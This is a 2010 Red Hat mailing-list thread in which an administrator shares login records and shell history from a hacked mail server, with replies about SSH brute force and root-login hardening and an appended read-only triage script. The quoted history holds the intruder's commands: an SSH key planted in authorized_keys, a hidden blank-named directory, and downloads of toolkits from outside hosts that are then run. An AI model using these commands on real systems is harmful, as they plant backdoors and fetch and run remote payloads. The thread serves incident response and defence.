help

Stainforth, Matthew (SD/DS) Matthew.Stainforth at gnb.ca
Thu Jan 28 13:28:46 UTC 2010


Agreed. 

Also, never allow root login via ssh.
Always keep the OS up to date with at least security patches.

This should not be news to this audience.


----- Original Message -----
From: redhat-list-bounces at redhat.com <redhat-list-bounces at redhat.com>
To: General Red Hat Linux discussion list <redhat-list at redhat.com>
Sent: Thu Jan 28 08:11:44 2010
Subject: Re: help

Brute force attacks. Leaving root ssh open to the world is begging to
be owned like this. Always turn that off or use key only auth for root
on Internet facing boxes.

Sent from my iPhone

On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy at gmail.com> wrote:

> Still I'm thinking how he/she got my password??
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy at gmail.com> wrote:
>
>> I have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan at ag-it.com> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces at redhat.com [redhat-list-bounces at redhat.com] On Behalf Of Joy Methew [ml4joy at gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> I am using RHEL5.3 as my mail server with a real IP. I configure my
>>> system mostly remotely. The last login time of my system was 27 Jan
>>> from this IP: 118.129.153.43.
>>> Then I tried to log in on 28 Jan in the morning, and I couldn't
>>> authenticate as root with my last password.
>>> Then I rebooted the system and reset my password.
>>> I logged in as root, then I ran the "last" command. I am sending the
>>> first 10 lines of the last command... I think someone hacked my system.
>>> I am sending the history command output.
>>> Now I removed the .ssh directory and /var/tmp/*
>>>
>>> Please suggest what is this??
>>>
>>> Thanks
>>>
>>> last command output:
>>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
>>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
>>> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
>>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
>>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
>>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
>>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
>>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>>>
>>> What is 165.red-79........ This is not my IP.
>>>
>>>
>>> History Output
>>>
>>> 115  cat /proc/cpuinfo
>>> 116  mkdir .ssh
>>> 117  cd .ssh
>>> 118  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 119  cd /var/tmp
>>> 120  mkdir " "
>>> 121  cd " "
>>> 122  passwd
>>> 123  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 124  ps -x
>>> 125  cd /var/tmp
>>> 126  w
>>> 127  wget http://kok.ucoz.de/gosh.tgz
>>> 128  tar xvf gosh.tgz
>>> 129  cd gosh
>>> 130  chmod +x *
>>> 131  ./go.sh 121
>>> 132  w
>>> 133  ps -x
>>> 134  ps -aux
>>> 135  cd /var/tmp
>>> 136  cd " "
>>> 137  ls -a
>>> 138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139  tar xzvf fld.tgz
>>> 140  cd fld
>>> 141  chmod +x *
>>> 142  nano cyc.acc
>>> 143  nano cyc.acc.1
>>> 144  nano cyc.set
>>> 145  ./httpd
>>> 146  w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com? 
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list

-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
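
The checks this thread recommends, as an added example that is not part of any poster's message: a read-only script that reports whether an sshd_config permits root password login, labels the entries in an authorized_keys file, and finds whitespace-named directories such as the `mkdir " "` in the quoted history. Function names and sample data are constructed; the config check reads only the two keywords shown and ignores Match blocks.

```shell
#!/bin/sh
# Added example: read-only triage checks for the pattern seen in this thread.
# Function names and the sample files built in demo() are constructed.

# Value of an sshd_config KEYWORD in FILE (sshd uses the first occurrence);
# prints DEFAULT if it is unset. Simplification: Match blocks are ignored.
sshd_setting() {
    awk -v k="$2" -v d="$3" '
        tolower($1) == tolower(k) { print tolower($2); found = 1; exit }
        END { if (!found) print d }' "$1"
}

# Succeeds when FILE lets root authenticate with a password. The "yes"
# defaults are an assumption matching older OpenSSH builds.
root_password_login_allowed() {
    [ "$(sshd_setting "$1" PermitRootLogin yes)" = "yes" ] &&
    [ "$(sshd_setting "$1" PasswordAuthentication yes)" = "yes" ]
}

# "type comment" for each key in an authorized_keys FILE, omitting the blob.
authorized_key_labels() {
    awk 'NF && $1 !~ /^#/ {
        for (i = 1; i <= NF; i++)
            if ($i ~ /^(ssh-|ecdsa-)/) { print $i, $(i + 2); break }
    }' "$1"
}

# Directories under DIR whose names are only whitespace, like `mkdir " "`.
blank_named_dirs() {
    find "$1" -type d ! -name '*[![:space:]]*'
}

demo() {  # runs the checks against constructed sample files in a temp dir
    t=$(mktemp -d)
    printf '#PermitRootLogin yes\nPasswordAuthentication yes\n' > "$t/weak"
    printf 'PermitRootLogin without-password\nPasswordAuthentication no\n' > "$t/hard"
    printf 'ssh-rsa AAAAPLACEHOLDER admin@example\n' > "$t/keys"
    printf 'ssh-rsa AAAAPLACEHOLDER rsa-key-20080201\n' >> "$t/keys"
    mkdir -p "$t/tmp/ " "$t/tmp/normal"
    root_password_login_allowed "$t/weak" && echo "weak: root password login allowed"
    root_password_login_allowed "$t/hard" || echo "hard: root password login blocked"
    authorized_key_labels "$t/keys"
    blank_named_dirs "$t/tmp" | sed 's/.*/blank-named dir: "&"/'
    rm -rf "$t"
}
demo
```

On a real host the same functions take /etc/ssh/sshd_config, root's authorized_keys file and /var/tmp as arguments.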



